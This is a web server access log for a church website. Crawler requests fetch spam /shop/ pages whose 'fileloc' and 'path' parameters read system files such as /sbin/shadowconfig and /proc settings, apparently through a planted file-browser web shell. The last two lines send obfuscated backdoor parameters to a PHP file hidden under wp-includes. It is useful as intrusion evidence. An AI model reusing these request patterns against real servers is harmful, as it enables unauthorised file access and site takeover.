2a03:2880:f800:: - - [13/Mar/2026:00:26:41 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/zh_CN.gb18030/LC_NAME&path=//lib/locale/zh_CN.gb18030 HTTP/1.1" 200 12309 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:41 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/x86_64-linux-gnu/libgmodule-2.0.so.0&path=//lib/x86_64-linux-gnu HTTP/1.1" 200 12276 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:26:42 -0400] "GET /shop/lachrymals/pestilential142250080589.html?fileloc=//proc/sys/net/ipv4/conf/lo/proxy_arp&path=//proc/sys/net/ipv4/conf/lo HTTP/1.1" 200 12435 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/sys/net/ipv4/conf/lo" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:42 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/et_EE.utf8/LC_MONETARY&path=//lib/locale/et_EE.utf8 HTTP/1.1" 200 12304 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:26:42 -0400] "GET /shop/chatoyment/oosporangium143258294809.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:42 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/kunden/usr/include/linux/unix_diag.h&path=//kunden/kunden/usr/include/linux HTTP/1.1" 200 13762 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:43 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/tr_TR/LC_CTYPE&path=//lib/locale/tr_TR HTTP/1.1" 200 12286 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:43 -0400] "GET /shop/ophiobolus/ecgonine131807598925.html HTTP/1.1" 200 218544 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:44 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/kunden/usr/include/linux/tee.h&path=//kunden/kunden/usr/include/linux HTTP/1.1" 200 26075 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:44 -0400] "GET /shop/ouranographist/endamage122614028637.html HTTP/1.1" 200 217618 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:44 -0400] "GET /shop/recur/timbuctoo13797631411.html HTTP/1.1" 200 223074 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:44 -0400] "GET /shop/croche/transcalency111011266629.html HTTP/1.1" 200 211749 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:44 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/kunden/usr/include/linux/stm.h&path=//kunden/kunden/usr/include/linux HTTP/1.1" 200 13703 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:45 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/kunden/usr/include/linux/stat.h&path=//kunden/kunden/usr/include/linux HTTP/1.1" 200 19194 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:26:45 -0400] "GET /shop/lachrymals/pestilential142250080589.html?fileloc=//proc/sys/net/ipv6/conf/eth0/mtu&path=//proc/sys/net/ipv6/conf/eth0 HTTP/1.1" 200 12438 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/sys/net/ipv6/conf/eth0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:45 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/kunden/usr/include/linux/hpet.h&path=//kunden/kunden/usr/include/linux HTTP/1.1" 200 13166 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
40.77.167.0 - - [13/Mar/2026:00:26:45 -0400] "GET /shop/vireton/wigging202792176180.html HTTP/1.1" 200 220689 www.baptist-temple.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:45 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/csb_PL/LC_COLLATE&path=//lib/locale/csb_PL HTTP/1.1" 200 12291 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:26:46 -0400] "GET /shop/chloroplasts/dininghall141260451082.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:46 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/x86_64-linux-gnu/ldscripts/elf32_x86_64.xsce&path=//lib/x86_64-linux-gnu/ldscripts HTTP/1.1" 200 21604 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:47 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/pap_CW/LC_TIME&path=//lib/locale/pap_CW HTTP/1.1" 200 12288 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:47 -0400] "GET /shop/emotion/semite132459374940.html HTTP/1.1" 200 214787 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:47 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=/homepages/29/d208662028/phpinilist&path=/homepages/29/d208662028 HTTP/1.1" 200 12313 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:48 -0400] "GET /shop/coacher/mayors102099113446.html?fileloc=//sbin/shadowconfig&path=//sbin HTTP/1.1" 200 12195 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:26:48 -0400] "GET /shop/lachrymals/pestilential142250080589.html?fileloc=//proc/sys/net/ipv4/conf/all/accept_local&path=//proc/sys/net/ipv4/conf/all HTTP/1.1" 200 12441 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/sys/net/ipv4/conf/all" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:48 -0400] "GET /shop/restorator/uncharitable101607981812.html?path=//homepages/oneclick/WebCalendar HTTP/1.1" 200 14099 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:48 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=/homepages/45/d692485590/.created&path=/homepages/45/d692485590 HTTP/1.1" 200 12322 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a02:598:: - - [13/Mar/2026:00:26:48 -0400] "GET /shop/crepitus/gainfulness11233654297.html HTTP/1.1" 200 54919 www.baptist-temple.com "-" "Mozilla/5.0 (compatible; SeznamBot/4.0; +https://o-seznam.cz/napoveda/vyhledavani/en/seznambot-crawler/)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:49 -0400] "GET /shop/mayas/fatimite132098555213.html HTTP/1.1" 200 214149 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
144.76.32.0 - - [13/Mar/2026:00:26:49 -0400] "GET /shop/classicalism/dracunculi141886387743.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:49 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/csb_PL/LC_MEASUREMENT&path=//lib/locale/csb_PL HTTP/1.1" 200 12318 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:49 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/zh_TW.utf8/LC_MEASUREMENT&path=//lib/locale/zh_TW.utf8 HTTP/1.1" 200 12330 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:50 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/tr_TR/LC_ADDRESS&path=//lib/locale/tr_TR HTTP/1.1" 200 12288 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:50 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/tr_TR/LC_TELEPHONE&path=//lib/locale/tr_TR HTTP/1.1" 200 12350 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:50 -0400] "GET /shop/fallible/lookover162641977811.html?path=//lib/python3.9/html HTTP/1.1" 200 18407 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:26:51 -0400] "GET /shop/lachrymals/pestilential142250080589.html?fileloc=//proc/sys/net/ipv6/conf/all/accept_ra_min_hop_limit&path=//proc/sys/net/ipv6/conf/all HTTP/1.1" 200 12452 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/sys/net/ipv6/conf/all" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:52 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/tr_TR/LC_NAME&path=//lib/locale/tr_TR HTTP/1.1" 200 12285 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:52 -0400] "GET /shop/pittlepattle/mispronounced131882134242.html HTTP/1.1" 200 224062 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:52 -0400] "GET /shop/fallible/lookover162641977811.html?path=//lib/locale/es_DO.utf8 HTTP/1.1" 200 30161 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:52 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/python3.9/__pycache__/pkgutil.cpython-39.pyc&path=//lib/python3.9/__pycache__ HTTP/1.1" 200 12330 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:26:53 -0400] "GET /shop/cockhorse/disembarkment143899930799.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:53 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/dsb_DE/LC_ADDRESS&path=//lib/locale/dsb_DE HTTP/1.1" 200 12291 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:53 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/de_AT@euro/LC_CTYPE&path=//lib/locale/de_AT@euro HTTP/1.1" 200 12301 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:54 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/apt-cache&path=//kunden/usr/bin HTTP/1.1" 200 12284 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:26:54 -0400] "GET /shop/lachrymals/pestilential142250080589.html?fileloc=//proc/sys/net/ipv6/conf/all/accept_ra_from_local&path=//proc/sys/net/ipv6/conf/all HTTP/1.1" 200 12449 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/sys/net/ipv6/conf/all" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:54 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/debconf-show&path=//kunden/usr/bin HTTP/1.1" 200 14333 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:55 -0400] "GET /shop/fallible/lookover162641977811.html?path=//lib/locale/de_AT HTTP/1.1" 200 29919 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:56 -0400] "GET /shop/fallible/lookover162641977811.html?path=//lib/locale/fr_LU HTTP/1.1" 200 29919 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:56 -0400] "GET /shop/fallible/lookover162641977811.html?path=//lib/locale/wal_ET HTTP/1.1" 200 29966 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:56 -0400] "GET /shop/waybung/playfere134211067174.html HTTP/1.1" 200 217133 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
144.76.32.0 - - [13/Mar/2026:00:26:56 -0400] "GET /shop/commandingly/bindheimite14959958958.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:57 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/python3.9/multiprocessing/__pycache__/popen_fork.cpython-39.pyc&path=//lib/python3.9/multiprocessing/__pycache__ HTTP/1.1" 200 12433 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:57 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/es_CO/LC_TIME&path=//lib/locale/es_CO HTTP/1.1" 200 12285 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:26:57 -0400] "GET /shop/lachrymals/pestilential142250080589.html?fileloc=//proc/sys/net/ipv6/conf/all/accept_ra_rtr_pref&path=//proc/sys/net/ipv6/conf/all HTTP/1.1" 200 12447 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/sys/net/ipv6/conf/all" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:58 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/dpkg-vendor&path=//bin HTTP/1.1" 200 15624 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:58 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/zh_TW.utf8/LC_CTYPE&path=//lib/locale/zh_TW.utf8 HTTP/1.1" 200 12301 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:26:58 -0400] "GET /shop/capros/thickkneed134251216566.html HTTP/1.1" 200 218184 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:59 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/kunden/sbin/cpgr&path=//kunden/kunden/sbin HTTP/1.1" 200 12294 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:26:59 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/kunden/sbin/useradd&path=//kunden/kunden/sbin HTTP/1.1" 200 12297 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:27:00 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/setpriv&path=//bin HTTP/1.1" 200 12187 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
20.15.133.0 - - [13/Mar/2026:00:27:00 -0400] "GET /shop/aggrievance/sugar123457640785.html HTTP/1.1" 200 218407 www.baptist-temple.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" "-"
144.76.32.0 - - [13/Mar/2026:00:27:00 -0400] "GET /shop/commissioning/anguicida142934317499.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
17.241.227.0 - - [13/Mar/2026:00:27:00 -0400] "GET /shop/courts/khenna132578911698.html HTTP/1.1" 200 54919 www.baptist-temple.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:27:00 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/pnmalias&path=//bin HTTP/1.1" 200 12188 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:27:01 -0400] "GET /shop/lachrymals/pestilential142250080589.html?fileloc=//proc/sys/net/ipv4/conf/all/accept_source_route&path=//proc/sys/net/ipv4/conf/all HTTP/1.1" 200 12448 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/sys/net/ipv4/conf/all" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:27:01 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/mknod&path=//bin HTTP/1.1" 200 12185 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:27:01 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/locale/zh_CN.gb18030/LC_IDENTIFICATION&path=//lib/locale/zh_CN.gb18030 HTTP/1.1" 200 12319 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:27:01 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/svn&path=//bin HTTP/1.1" 200 12183 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:27:02 -0400] "GET /shop/fallible/lookover162641977811.html?path=//lib/locale/zh_HK HTTP/1.1" 200 29920 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:27:02 -0400] "GET /shop/kickshaws/onychomancy133803250727.html HTTP/1.1" 200 216705 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
74.208.59.0 - - [13/Mar/2026:00:23:54 -0400] "GET /wp-includes/js/jquery/jquery/index.php?ARRAY=7o2230223n313737333337393433342p2231223n22687474703n5p2s5p2s7n733738307631336o6s2r73616r6369626p652r6963755p2s3s6p633q7068705s636s64655s6n6326743q313737333337353833342q3634373734336666326165663136613239316561333734343561636234623130222p2232223n223638396333653234623431623239353061386638383366356265343839393866222p2233223n226630633834306462643437326464376133373338326237636638383235333233222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q33332q35372q36372q37342q38332q3232227q HTTP/1.1" 200 52 www.baptist-temple.com "-" "-" "-"
74.208.59.0 - - [13/Mar/2026:00:24:14 -0400] "GET /wp-includes/js/jquery/jquery/index.php?ARRAY=7o2230223n313737333337393435342p2231223n22687474703n5p2s5p2s7n733738307631336o6s2r73616r6369626p652r6963755p2s3s6p633q7068705s636s64655s6n6326743q313737333337353835342q3861343339666539656162336264356332373766343065313266623937616234222p2232223n223638396333653234623431623239353061386638383366356265343839393866222p2233223n226630633834306462643437326464376133373338326237636638383235333233222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q33332q35372q36372q37342q38332q3232227q HTTP/1.1" 200 52 www.baptist-temple.com "-" "-" "-"
